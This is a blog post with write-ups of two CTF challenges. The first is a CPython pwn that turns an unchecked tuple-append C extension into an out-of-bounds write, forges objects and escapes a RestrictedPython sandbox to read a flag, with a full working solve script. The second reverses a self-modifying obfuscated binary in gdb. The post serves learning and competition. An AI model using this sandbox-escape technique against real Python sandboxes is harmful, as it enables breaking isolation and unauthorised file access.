sctf/upsolves

recommended listening for this post is 明日にはすべてが終わるとして by kinokoteikoku.

image

azazo and i did this ctf alongside one other friend. the event is long gone now but i decided to upsolve this python pwn challenge by samuzora that i thought was really fun. it took me about 8 hours.

edit 24th jan i also upsolved one of the unsolved revs, attached below

pwn/mutuple

I made tuples mutable… you can call them mutuples ecks dee

by samuzora

0 solves

wah 0 solves fucking kena this one

the challenge introduces a custom mutuple library with an append function.

#define PY_SSIZE_T_CLEAN
#include <python3.9/Python.h>

PyObject *PyInit_mutuple(void);

static PyObject *method_append(PyObject *, PyObject *);

PyMethodDef methods[] = { 
  {
    .ml_name = "append",
    .ml_meth = method_append,
    .ml_flags = METH_VARARGS
  }
};

PyModuleDef definition = {
  .m_name = "mutuple",
  .m_methods = methods,
};

PyObject *PyInit_mutuple() {
  PyModule_Create(&definition);
}

static PyObject *method_append(PyObject *self, PyObject *args) {
  PyTupleObject *the_tuple = NULL;
  PyObject *to_add = NULL;

  if (!PyArg_UnpackTuple(args, "ref", 2, 2, &the_tuple, &to_add)) {
    return NULL;
  }

  if (!PyTuple_Check(the_tuple)) {
    PyErr_SetString(PyExc_TypeError, "first argument must be of type tuple");
    return NULL;
  }

  the_tuple->ob_item[the_tuple->ob_base.ob_size++] = to_add;

  return Py_True;
}

setup

getting this setup on your local machine is actually nontrivial, esp. if you want debug symbols on python (which are super nice to have due to the struct definitions being given for you). consulting the Dockerfile we can see that it’s python 3.9, so let’s get python 3.9 and compile it with debug symbols. the process for this is shown in my rev/disthis writeup over on the slight-smile website (check us out ^_^) so i won’t belabor the point.

the key thing you’ll want to do is copy the provided compiled library (with debug symbols also, bless u lucas) into the correct directory, in this case it’s /Python-3.9.0/build/lib.linux-x86_64-3.9-pydebug.

navi@curette (.linux-x86_64-3.9-pydebug) > ls
array.cpython-39d-x86_64-linux-gnu.so             _opcode.cpython-39d-x86_64-linux-gnu.so
_asyncio.cpython-39d-x86_64-linux-gnu.so          ossaudiodev.cpython-39d-x86_64-linux-gnu.so
audioop.cpython-39d-x86_64-linux-gnu.so           parser.cpython-39d-x86_64-linux-gnu.so
binascii.cpython-39d-x86_64-linux-gnu.so          _pickle.cpython-39d-x86_64-linux-gnu.so
_bisect.cpython-39d-x86_64-linux-gnu.so           _posixshmem.cpython-39d-x86_64-linux-gnu.so
_blake2.cpython-39d-x86_64-linux-gnu.so           _posixsubprocess.cpython-39d-x86_64-linux-gnu.so

this is where all the library nonsense lies. we can verify that the library is installed by calling from mutuple import *, here is me demoing the functionality.

>>> from mutuple import append
>>> a = (1,)
>>> append(a, 2)
True
>>> a
(1, 2)

lovely let’s get on with the solve

primitive: oob write of pointers

to be honest i didn’t actually dig too deep into the source code itself, i just kept whacking in gdb until i got a crash. but to explain the functionality, there’s no quote-unquote ‘bounds’ check as to the allocated area dedicated for the tuple, so if we keep appending to the given tuple, we’ll inevitably overwrite some adjacent tuples.

a major problem and annoyance w/ python pwn is that python seems to allocate objects wherever the fuck it feels like, thus making offsets wildly inconsistent. you can have a working solve script that relies on a baked-in offset, keep making edits to it, and then it completely whacks up the offset. we circumvent this by allocating a bunch of tuples, checking the offsets of adjacent items in memory, and just hoping we get a nice number. here is some code that does exactly that, we just spray and pray and hope for two tuples at offset 0x50 from one another.

vals = []
vm = lambda x: print_(hex(id(x)))

for i in range(10000):
    vals.append((i,))
    if i > 1:
        if id(vals[i]) - id(vals[i-1]) == 0x50:
            offset = i-1
            break

vm(vals[offset])
vm(vals[offset + 1])
input('...')

at this point in the challenge it behooves us to learn a bit more about the PyTupleObject struct as defined in CPython. lucas samuzora tan has a really good deep-dive into this on his author writeup for the challenge so i won’t belabor the point, i’ll just go over what is strictly necessary to solve the challenge. we’ll get the address of one of our tuples and poke around in it in gdb.

again, note that compiling with symbols is really nice because we can automatically resolve all these type definitions and struct formats.

gef> p *(PyTupleObject*)0x7ffff755ce10
$1 = {
  ob_base = {
    ob_base = {
      ob_refcnt = 0x1,
      ob_type = 0x5555558fc020 <PyTuple_Type>
    },
    ob_size = 0x1
  },
  ob_item = {
    [0x0] = 0x7ffff7cb6380
  }
}

the important things here are ob_size, ob_type, and ob_item. ob_size is the number of items in the tuple, ob_type is a pointer to the type object in Python, and ob_item is an array containing pointers to everything in the tuple.

viewing the raw bytes and eyepowering the structs we can see the two tuples, almost side-by-side:

gef> x/16x 0x7ffff759f820

[here is the first tuple]
0x7ffff759f820:	0x0000000000000001	0x00005555558fc020
0x7ffff759f830:	0x0000000000000001	0x00007ffff7cb3e40 <- [here is the first object]
0x7ffff759f840:	0xfdfdfdfdfdfdfdfd	0xdddddddddddddddd

[i have no idea what this nonsense is]
0x7ffff759f850:	0x3000000000000000	0xfdfdfdfdfdfdfd6f
0x7ffff759f860:	0x0000555555949fb0	0x00007ffff759f810

[here is the second tuple]
0x7ffff759f870:	0x0000000000000001	0x00005555558fc020
0x7ffff759f880:	0x0000000000000001	0x00007ffff7cb3e80
0x7ffff759f890:	0xfdfdfdfdfdfdfdfd	0xdddddddddddddddd

the tuples are basically almost kissing. given that each .append() occupies one qword, we can eyepower and see we need to append 6 qwords to get through all the garbage, and then our next .append() would start impacting struct metadata. we whack once to impact ob_refcnt, then another time to whack ob_type.

for i in range(6):
    append(vals[offset], 'rawr')

append(vals[offset], 'woof') # <- now we whack the ob_refcnt, which doesnt do much
append(vals[offset], 'meow') # <- this one kena whack the ob_type

print_(type(vals[offset + 1]))
input('...')

running this, we’ll see that our type for the second tuple is now altered.

starting the exploit...
0x7ff988963be0
0x7ff988963c30
tuple type >  meow

epic. an important caveat of this write is that we are currently unable to write arbitrary bytes, just pointers to objects. say, if we wanted to write nulls to some fields, we just couldn’t, because no Python function is able to return a nullptr without erroring out.

so what do we do? given that we can still whack ob_size, we can create a tuple that’s just, really fucking big:

for i in range(6):
    append(vals[offset], 'rawr')

append(vals[offset], 'woof')
append(vals[offset], tuple) # <- we actually don't want to alter our struct's type here
append(vals[offset], 'meow') # <- this whacks the ob_size

vuln = vals[offset+1]
print_('tuple type > ', type(vuln))
print_('tuple size > ', len(vuln))
input('...')

a neat hack here is that if we want to get to ob_size, we’ll naturally have to whack ob_type. we don’t actually want to whack ob_type! but since we’re able to write pointers, we have access to the tuple pointer by directly writing tuple.

this results in our huge tuple.

navi@curette (ves/pwn-mutuple/src/chall) > cp fuzz.py /tmp/fuzz.py; ./python run.py fuzz.py
starting the exploit...
0x7f3ccf0b0190
0x7f3ccf0b01e0
tuple type >  <class 'tuple'>
tuple size >  139899148097392

this is OOB read. the thing is, we still can’t read raw bytes, because when we index into the tuple, it dereferences the pointer at that index of the ob_item array - it doesn’t actually return the bytes themselves.

the question then becomes: how do we forge bytes? in other python pwn a really handy tool is bytearray, but the challenge does not give us access to this :(

instead we can just write bytes, with, well, bytes. the bytes object actually does contain the raw bytes written to it as a contiguous section in one of its struct fields. let’s demonstrate by creating a bytes object and analysing it.

b = b'rawr rawr woof'
print_(hex(id(b)))
input('...')

hopping into gef:

gef> p *(PyBytesObject*)0x7ffff755c8b0
$2 = {
  ob_base = {
    ob_base = {
      ob_refcnt = 0x2,
      ob_type = 0x5555558ed400 <PyBytes_Type>
    },
    ob_size = 0xe
  },
  ob_shash = 0xb57bd7371431d8f2,
  ob_sval = "r"
}

the ob_sval field is what we want here. we can print this as a string and verify the bytes are there.

gef> x/g (*(PyBytesObject*) 0x7ffff755c900)->ob_sval
0x7ffff755c920:	0x7761722072776172
gef> x/s (*(PyBytesObject*) 0x7ffff755c900)->ob_sval
0x7ffff755c920:	"rawr rawr woof"

so this becomes our handy primitive to create raw bytes. we’ll use this to forge pointers to objects in the Python namespace - because we now have a really large tuple, as long as our forged tuple is before our forged bytes object in memory, we can just access it by indexing into the tuple.

we will have to figure out something nice to forge. let’s actually look at the set-up for the challenge (it accepts a base64 encoded .py file and runs it with severe restrictions > )

#!/usr/bin/python3.9 -u
from mutuple import append
from sys import modules, argv
del modules['os']
keys = list(__builtins__.__dict__.keys())

from RestrictedPython import compile_restricted, safe_builtins
from RestrictedPython.Eval import default_guarded_getiter
from RestrictedPython.Guards import full_write_guard

from operator import getitem

def _inplacevar_(op, var, expr):
    if op == "+=":
            return var + expr
    elif op == "-=":
            return var - expr
    elif op == "*=":
        return var * expr
    elif op == "/=":
        return var / expr
    elif op == "%=":
        return var % expr
    elif op == "**=":
        return var ** expr
    elif op == "<<=":
        return var << expr
    elif op == ">>=":
        return var >> expr
    elif op == "|=":
        return var | expr
    elif op == "^=":
        return var ^ expr
    elif op == "&=":
        return var & expr
    elif op == "//=":
        return var // expr
    elif op == "@=":
        return var // expr

filename = argv[1]
with open(f"/tmp/{filename}", "r") as file:
    builtins = safe_builtins
    builtins["_getitem_"] = getitem
    builtins["_getiter_"] = default_guarded_getiter
    builtins["_inplacevar_"] = _inplacevar_
    builtins["_write_"] = full_write_guard
    builtins["bytes"] = bytes
    builtins["chr"] = chr
    builtins["input"] = input
    builtins["append"] = append
    builtins["ord"] = ord
    builtins["print_"] = print # allow printing in sandbox
    builtins["type"] = type
    print('starting the exploit...')
    exec(
        compile_restricted(file.read(), filename="<inline-code>", mode="exec"),
        {"__builtins__": builtins},
        None
    )

this specifically gates access to python’s builtins and replaces it with a safer version. the thing is though, this builtins module still exists in the memory, and we can find, reference, and forge a pointer to this module.

of course, we cannot directly reference it by calling id(), but since it’s defined in the python heap somewhere (I Think), we can work off the assumption that it’s a fixed offset other objects, and just subtract and add accordingly - this is similar to how actual C pwn works, of course (finding libc addresses, so on so forth).

the quote unquote ‘reference’ point i use is id(0). to actually debug and find the offset i just patched in a reference to the builtins module in run.py as so:

builtins["type"] = type
builtins["ref"] = __builtins__

then in the solve script, we run this a few times and make sure the offset is constant.

vuln = vals[offset+1]
print_('offset to builtins > ', hex(id(0) - id(ref)))

all that’s left to do is:

a - create a byte object whose bytestring is a pointer to builtins.

b - calculate the offset from the byte object to our forged “big” tuple.

c - index into the tuple and retrieve our reference to builtins.

d - win!

now, this handwaves over a lot of concerns which a more competent pwner could’ve overcome in less than 10 minutes but i, level 2 mafia rookie, stumbled over for a few hours (making sure that the offsets are correctly calculated, making sure that the tuple is placed before the bytestring, dynamically accommodating for essentialy ‘random’ offsets because python fucking hates me i guess).

but the solvepath is sound, and it does work. here is the full solvescript, for posterity:

vals = []

for i in range(10000):
    vals.append((i,))
    if i > 1:
        if id(vals[i]) - id(vals[i-1]) == 0x30:
            offset = i-1
            break

for i in range(3):
    append(vals[offset], 'rawr xd')
append(vals[offset], tuple)
append(vals[offset], type)
append(vals[offset], str)
append(vals[offset], int)
append(vals[offset], complex)

vuln = vals[offset+1]
print_('offset to builtins > ', hex(id(0) - id(ref)))
print_('type of vuln >', type(vuln))
addr_to_write = id(0) - 0x38010

obj = addr_to_write.to_bytes(8, byteorder='little')

byte_overwrite = []

for i in range(1, 10000):
    f = b''
    for i in obj:
        f += i.to_bytes(1, 'big')
    byte_overwrite.append(f)
    offset = id(f) - id(vuln)
    if 0x1000 > offset > 0x0: 
        print_(hex(offset))
        break

f = byte_overwrite[-1]
target_idx = (id(f) - id(vuln) + 0x08) // 8
print_('target_idx > ', target_idx);
print_('target_addr >', addr_to_write)
a = vuln[target_idx].open("flag.txt").read()
print_(a)

closing

funny story is that this challenge took me really long to solve (around 8 hours) because i kept fucking up and making a bunch of mistakes. i had the primitive very early on and just spent so much time skillissuing on really trivial parts of the challenge :S

i wanted to make my solve libc-agnostic because i couldn’t be bothered to properly figure out how the docker container treats its libcs, so i went with the pyjail-style builtins retrieval.

thanks to lucas for the fun pwn!

rev/helloworld

name: Hello, World!

author: Elma

description: ‘I wrote my first program ever. Of course it just prints Hello World!

solves: 0

very weird challenge involving some obfuscation that i did not really fully understand very well, but even without understanding everything you can get a good idea of what is going on. i kind of loosely already knew that there would be some anti-decompilation techniques so i didn’t bother decompiling anything at all and just rawdogged the asm instead.

first things first is if we strace the binary we can see some rather suspicious calls to mprotect()

mprotect(0x55f07ccc0000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
mprotect(0x55f07ccc0000, 4096, PROT_READ|PROT_EXEC) = 0
...
write(1, "Hello world!\n", 13Hello world!
)          = 13
exit_group(0)                           = ?
+++ exited with 0 +++

this maps a RWX page into memory, which is assuredly not standard behaviour. we can catch any mprotect syscalls in gdb with catch syscall mprotect.

 -> 0x555555555178 0f05                  <__do_global_dtors_aux+0x88>   syscall
    0x55555555517a 4c8d0566000000        <__do_global_dtors_aux+0x8a>   lea    r8, [rip + 0x66] # 0x5555555551e7 <__do_global_dtors_aux+0xf7>
    0x555555555181 4c8d0db0010000        <__do_global_dtors_aux+0x91>   lea    r9, [rip + 0x1b0] # 0x555555555338 <frame_dummy>
    0x555555555188 4c87f4                <__do_global_dtors_aux+0x98>   xchg   rsp, r14
    0x55555555518b 4883ec08              <__do_global_dtors_aux+0x9b>   sub    rsp, 0x8
    0x55555555518f 58                    <__do_global_dtors_aux+0x9f>   pop    rax

[+] Detected syscall (arch:X86, mode:64)
    mprotect(unsigned long start, size_t len, unsigned long prot)
[+] Parameter            Register             Value
    RET                  $rax                 -                   
    NR                   $rax                 0xa
    start                $rdi                 0x0000555555555000  ->  0x08ec8348fa1e0ff3
    len                  $rsi                 0x0000000000001000
    prot                 $rdx                 0x0000000000000007

we are in some function __do_global_dtors_aux, which is a function introduced by gcc to handle… something. it’s not important nor relevant, all we know is that it is assuredly not supposed to be mprotecting a region of memory. what region of memory even is that anyway? inspecting in vmmap reveals it’s just some address to a page in the binary itself. the most important thing here is that this page includes the .text section of our binary, so it is RWX-mapping an area including executable code. typically this means the code is self-modifying.

Start              End                Size               Offset             Perm Path
0x0000555555555000 0x0000555555556000 0x0000000000001000 0x0000000000001000 r-x /home/navi/upsolves/Sieberrsec-CTF-2025-Public/finals/re/hello_world/dist/helloworld.elf +0x0  <-  $rbx, $rdi, $rip, $r13

ideally we would trace the instructions executed by the binary but there seems to be some weird control-flow-flattening kind effect, where sections of these __do_global_dtors_aux blocks are chained together with some trampoline in __libc_start_main.

 -> 0x55555555519a c3                    <__do_global_dtors_aux+0xaa>   ret   

   -> 0x7ffff7c29ebb 4c89f1                <__libc_start_main+0xfb>   mov    rcx, r14
      0x7ffff7c29ebe 4c39742408            <__libc_start_main+0xfe>   cmp    QWORD PTR [rsp + 0x8], r14
      0x7ffff7c29ec3 75e3                  <__libc_start_main+0x103>   jne    0x7ffff7c29ea8 <__libc_start_main+0xe8>
      0x7ffff7c29ec5 e959ffffff            <__libc_start_main+0x105>   jmp    0x7ffff7c29e23 <__libc_start_main+0x63>
      0x7ffff7c29eca 488b1df7ff1e00        <__libc_start_main+0x10a>   mov    rbx, QWORD PTR [rip + 0x1efff7] # 0x7ffff7e19ec8
      0x7ffff7c29ed1 498b3424              <__libc_start_main+0x111>   mov    rsi, QWORD PTR [r12]

indeed, after our mprotect is performed, it does something w/ the registers, rets back to __libc_start_main, and eventually __libc_start_main jumps back into another section of code in __do_global_dtors_aux.

 -> 0x7ffff7c29eb9 ff11                  <__libc_start_main+0xf9>   call   QWORD PTR [rcx] <__do_global_dtors_aux+0xc0>

   -> 0x5555555551b0 8a03                  <__do_global_dtors_aux+0xc0>   mov    al, BYTE PTR [rbx]
      0x5555555551b2 413000                <__do_global_dtors_aux+0xc2>   xor    BYTE PTR [r8], al
      0x5555555551b5 48ffc3                <__do_global_dtors_aux+0xc5>   inc    rbx
      0x5555555551b8 49ffc0                <__do_global_dtors_aux+0xc8>   inc    r8
      0x5555555551bb 4c87f4                <__do_global_dtors_aux+0xcb>   xchg   rsp, r14
      0x5555555551be 4883ec08              <__do_global_dtors_aux+0xce>   sub    rsp, 0x8

oh well. the exact mechanics of this dont really matter to us. we can just manually step through by spamming stepis until we get back to our relevant code blocks.

and .. here we see a very interesting codeblock, actually.

    0x5555555551ab 8d5050                <__do_global_dtors_aux+0xbb>   lea    edx, [rax+0x50]
    0x5555555551ae 8a00                  <__do_global_dtors_aux+0xbe>   mov    al, BYTE PTR [rax]
 -> 0x5555555551b0 8a03                  <__do_global_dtors_aux+0xc0>   mov    al, BYTE PTR [rbx]
    0x5555555551b2 413000                <__do_global_dtors_aux+0xc2>   xor    BYTE PTR [r8], al
    0x5555555551b5 48ffc3                <__do_global_dtors_aux+0xc5>   inc    rbx
    0x5555555551b8 49ffc0                <__do_global_dtors_aux+0xc8>   inc    r8
    0x5555555551bb 4c87f4                <__do_global_dtors_aux+0xcb>   xchg   rsp, r14
    0x5555555551be 4883ec08              <__do_global_dtors_aux+0xce>   sub    rsp, 0x8
----------------------------------- memory access: $rbx = 0x555555555338 ----
$rbx+ 0x555555555338|+0x0000|+000: 0x48f4874cfa1e0ff3
      0x555555555340|+0x0008|+001: 0xfe1605485808ec83
      0x555555555348|+0x0010|+002: 0x5de9f4874c50ffff
      0x555555555350|+0x0018|+003: 0x48e5894855fffffd

note the memory access and the xor BYTE PTR [r8], al instruction - these addresses are in the page marked RWX, and here we are, xoring the bytes with some key somewhere. we can inspect more of the asm, seeing that it increments the ptr in r8 and xors the bytes in a loop until r8 == r9.

gef> x/16i $rip
=> 0x5555555551b0 <__do_global_dtors_aux+192>:	mov    al,BYTE PTR [rbx]
   0x5555555551b2 <__do_global_dtors_aux+194>:	xor    BYTE PTR [r8],al
   0x5555555551b5 <__do_global_dtors_aux+197>:	inc    rbx
   0x5555555551b8 <__do_global_dtors_aux+200>:	inc    r8
   0x5555555551bb <__do_global_dtors_aux+203>:	xchg   rsp,r14
   0x5555555551be <__do_global_dtors_aux+206>:	sub    rsp,0x8
   0x5555555551c2 <__do_global_dtors_aux+210>:	pop    rax
   0x5555555551c3 <__do_global_dtors_aux+211>:	cmp    r8,r9
   0x5555555551c6 <__do_global_dtors_aux+214>:	jne    0x5555555551ce <__do_global_dtors_aux+222>
   0x5555555551c8 <__do_global_dtors_aux+216>:	add    rax,0x37
   0x5555555551ce <__do_global_dtors_aux+222>:	push   rax
   0x5555555551cf <__do_global_dtors_aux+223>:	xchg   rsp,r14
   0x5555555551d2 <__do_global_dtors_aux+226>:	ret

note that when the loop completes, it adds 0x37 to rax and just hits the same ret instruction that an incomplete loop would hit, so it goes back to that same libc_start_main trampoline thingy with the exact same state aside from rax - this means that rax is somehow used in that trampoline to dictate which block we then go to next.

however it just doesn’t really matter to reverse more of it because we can just.. keep stepping through and seeing which block we hit. :) doing so reveals that our next endpoint just turns out to be the bytes we XOR’d earlier. (r8 is initialized to 0x5555555551e7, and we end up jumping to 0x5555555551e7).

 -> 0x7ffff7c29eb9 ff11                  <__libc_start_main+0xf9>   call   QWORD PTR [rcx] <__do_global_dtors_aux+0xf7>

   -> 0x5555555551e7 4883fd02              <__do_global_dtors_aux+0xf7>   cmp    rbp, 0x2
      0x5555555551eb 750f                  <__do_global_dtors_aux+0xfb>   jne    0x5555555551fc <__do_global_dtors_aux+0x10c>
      0x5555555551ed 4d8b442408            <__do_global_dtors_aux+0xfd>   mov    r8, QWORD PTR [r12 + 0x8]
      0x5555555551f2 4c8d0d3f010000        <__do_global_dtors_aux+0x102>   lea    r9, [rip + 0x13f] # 0x555555555338 <frame_dummy>
      0x5555555551f9 4831db                <__do_global_dtors_aux+0x109>   xor    rbx, rbx
      0x5555555551fc 4c87f4                <__do_global_dtors_aux+0x10c>   xchg   rsp, r14

our very first cmp then dictates where we branch off to, here it’s a compare to rbp = 0x2. right now our rbp is 0x1.

gef> i r
rax            0x5555555551e7      0x5555555551e7
rbx            0x555555555489      0x555555555489
rcx            0x5555555570a8      0x5555555570a8
rdx            0x7fffffffdca8      0x7fffffffdca8
rsi            0x7fffffffdc98      0x7fffffffdc98
rdi            0x1                 0x1
rbp            0x1                 0x1

this means we take the jne branch, which .. does something, again, with the weird libc_start_main trampoline, but what is important is we immediately hit a branch that just de-mprotects the page and exits out, so that’s no good.

it may be unclear as to how we get rbp to pass our 0x2 check, this just comes down to a knowledge gap: given that we are so early on in the binary (we are in the middle of libc constructor functions that i really have no earthly idea about), rbp typically holds the number of arguments passed in to stdin.

(this is the one thing i am unclear about as to how you would ‘figure it out’, i knew enough about the challenge that stdin arguments would be involved, so i just guessed. setting $rbp=2 artificially in gdb and stepping through does end in a segfault where you try to access some nullptr that’s near environment variables on the stack, so i suppose that would be a safe guess then. either way…)

armed w/ that knowledge we can just run the binary with a stdin argument and keep on going, we’ll see another strange xor loop in the following block.

=> 0x55555555521d <__do_global_dtors_aux+301>:	mov    dl,BYTE PTR [r8]
   0x555555555220 <__do_global_dtors_aux+304>:	test   dl,dl
   0x555555555222 <__do_global_dtors_aux+306>:	je     0x555555555238 <__do_global_dtors_aux+328>
   0x555555555224 <__do_global_dtors_aux+308>:	xor    dl,BYTE PTR [r9]
   0x555555555227 <__do_global_dtors_aux+311>:	mov    BYTE PTR [r8],dl
   0x55555555522a <__do_global_dtors_aux+314>:	inc    rbx
   0x55555555522d <__do_global_dtors_aux+317>:	inc    r8
   0x555555555230 <__do_global_dtors_aux+320>:	inc    r9
   0x555555555233 <__do_global_dtors_aux+323>:	sub    r14,0x8
   0x555555555237 <__do_global_dtors_aux+327>:	ret

a few cool things to note here, we load from r8 (a pointer to the argument we pass in via stdin), and we end when the byte we load is null (i.e. the nullterm for whatever string we use as our argument).

we can verify that r8 points to an address on the stack with vmmap, however we are xoring it with some address in r9, which is an address in the binary. note that the final destination here is just r8, meaning that we are xoring the stdin argument in place as it sits on the stack.

also, $rbx functions as a loop counter. we don’t need a loop counter since we’re using the nullterm of our string as the loop end condition. i am helpfully noting this for later, when this comes up.

gef> vmmap $r8
[ Legend: Code | Heap | Stack | Writable | ReadOnly | None | RWX ]
Start              End                Size               Offset             Perm Path
0x00007ffffffdd000 0x00007ffffffff000 0x0000000000022000 0x0000000000000000 rw- [stack] +0x2102d  <-  $rdx, $rsp, $rsi, $r8, $r12
gef> vmmap $r9
[ Legend: Code | Heap | Stack | Writable | ReadOnly | None | RWX ]
Start              End                Size               Offset             Perm Path
0x0000555555555000 0x0000555555556000 0x0000000000001000 0x0000000000001000 rwx /home/navi/upsolves/Sieberrsec-CTF-2025-Public/finals/re/hello_world/dist/helloworld.elf +0x338  <-  $rax, $rip, $r9, $r13

anyways spamming stepis gets us to this code block:

    0x55555555528c 4883ec08              <__do_global_dtors_aux+0x19c>   sub    rsp, 0x8
    0x555555555290 58                    <__do_global_dtors_aux+0x1a0>   pop    rax
 -> 0x555555555291 4883fb30              <__do_global_dtors_aux+0x1a1>   cmp    rbx, 0x30

waow. a cmp rbx, 0x30. as we recall, rbx is just a loop counter, which means that it’s also the number of characters in our input. this means that our input should probably be 0x30 bytes long. re-running with 0x30 As in the input and once again spamming stepis gets us to this block of code:

 -> 0x5555555552b2 488d3598ffffff        <__do_global_dtors_aux+0x1c2>   lea    rsi, [rip + 0xffffffffffffff98] # 0x555555555251 <__do_global_dtors_aux+0x161>
    0x5555555552b9 4c87f4                <__do_global_dtors_aux+0x1c9>   xchg   rsp, r14
    0x5555555552bc 4883ec08              <__do_global_dtors_aux+0x1cc>   sub    rsp, 0x8
    0x5555555552c0 58                    <__do_global_dtors_aux+0x1d0>   pop    rax
    0x5555555552c1 f3a6                  <__do_global_dtors_aux+0x1d1>   repz   cmps BYTE PTR [rsi], BYTE PTR [rdi]
    0x5555555552c3 7408                  <__do_global_dtors_aux+0x1d3>   je     0x5555555552cd <__do_global_dtors_aux+0x1dd>

a repz cmps of bytes from [rsi] to [rdi]. before we do anything let’s just trivially bypass whatever check this is by setting rsi == rdi. doing so reveals that it prints a hidden message here.

gef> set $rsi=$rdi
gef> c
Continuing.
nice!
Hello world!
[Inferior 1 (process 247098) exited normally]

cool, so our goal should clearly be to pass this check.

we can just verify which two arrays are even being compared by inspecting the values of $rsi and $rdi.

gef> x/16g $rsi
0x555555555251 <__do_global_dtors_aux+353>:	0x219be0379c6a6c80	0x90797c2d3a578bed
0x555555555261 <__do_global_dtors_aux+369>:	0x028698eb2938a09b	0x32d4d62c398d908a
0x555555555271 <__do_global_dtors_aux+385>:	0xf12b353678c36ebf	0x7dda959984ae9bf4
0x555555555281 <__do_global_dtors_aux+401>:	0x000a216563696e00	0x5808ec8348f4874c
0x555555555291 <__do_global_dtors_aux+417>:	0x2d48087430fb8348	0x054806ebffffff85
0x5555555552a1 <__do_global_dtors_aux+433>:	0xf4874c5000000021	0x7e8b48d98948fcc3
0x5555555552b1 <__do_global_dtors_aux+449>:	0xffffff98358d4808	0x5808ec8348f4874c
0x5555555552c1 <__do_global_dtors_aux+465>:	0xffa62d480874a6f3	0x002e054806ebffff
gef> x/16x $rdi
0x7fffffffdfff:	0x09b5c60dbb5f4eb2	0xbf5744091949adc2
0x7fffffffe00f:	0x1ca8b5c60d11bebe	0x09a4c80914bebebc
0x7fffffffe01f:	0xc80941414de744cc	0x41f9bebebd8ba986
0x7fffffffe02f:	0x45545f5353454c00	0x65735f5041434d52
0x7fffffffe03f:	0x414d006d305b1b3d	0x2f7261762f3d4c49
0x7fffffffe04f:	0x76616e2f6c69616d	0x6e3d524553550069
0x7fffffffe05f:	0x474e414c00697661	0x006e653d45474155
0x7fffffffe06f:	0x5245545f5353454c	0x3d65755f5041434d

interestingly, note that rdi is just the address of our xored-in-place stdin input, and rsi is this array in the binary. recalling our initial xor-loop in the first place, we remember that the xor-key was stored in r9 during that weird code block, so we can just yoink the bytes from there by breakpointing again at that block again.

gef> x/16g $r9
0x555555555338 <frame_dummy>:	0x48f4874cfa1e0ff3	0xfe1605485808ec83
0x555555555348 <frame_dummy+16>:	0x5de9f4874c50ffff	0x48e5894855fffffd
0x555555555358 <main+5>:	0x894800000ca6058d	0x00b8fffffccae8c7
0x555555555368 <main+21>:	0x000000c35d000000	0x08ec8348fa1e0ff3

we xor the two bytestrings starting at those addresses to get our flag ^_^

from pwn import xor

a = '48f4874cfa1e0ff3fe1605485808ec835de9f4874c50ffff48e5894855fffffd894800000ca6058d00b8fffffccae8c7'
b = '219be0379c6a6c8090797c2d3a578bed028698eb2938a09b32d4d62c398d908af12b353678c36ebf7dda959984ae9bf4'

z = xor(bytes.fromhex(a), bytes.fromhex(b))
for i in range(0, len(z), 8):
    print(z[i:i+8][::-1].decode(), end='')
navi@curette (inals/re/hello_world/dist) > python solve.py
sctf{going_beyond_hello_world_1z2ket65cx3sdxfjb}                                                                                                       
navi@curette (inals/re/hello_world/dist) > ./helloworld.elf $(python solve.py)
nice!
Hello world!

closing

the actual obfuscation method used here is very cool, and i would be remiss not to mention elma’s great writeup on it, so do read that if you want to actually learn what the libc_start_main trampoline obfuscation nonsense at play here is. the purpose of this writeup is more so to share how a solver wld even go about dealing with this sort of obfuscation.

i think a better, more complete solve would completely unwind the obfuscation and have a nice control flow graph to look at instead of just rawdogging different blocks of asm via eyepower, i did want to learn some more tools / frameworks to get this done (if the binary was even more complicated, tracing manually and haphazardly like this would Not be feasible, you would need a more sophisticated approach. unfortunately this is not a level of sophistication i have :S)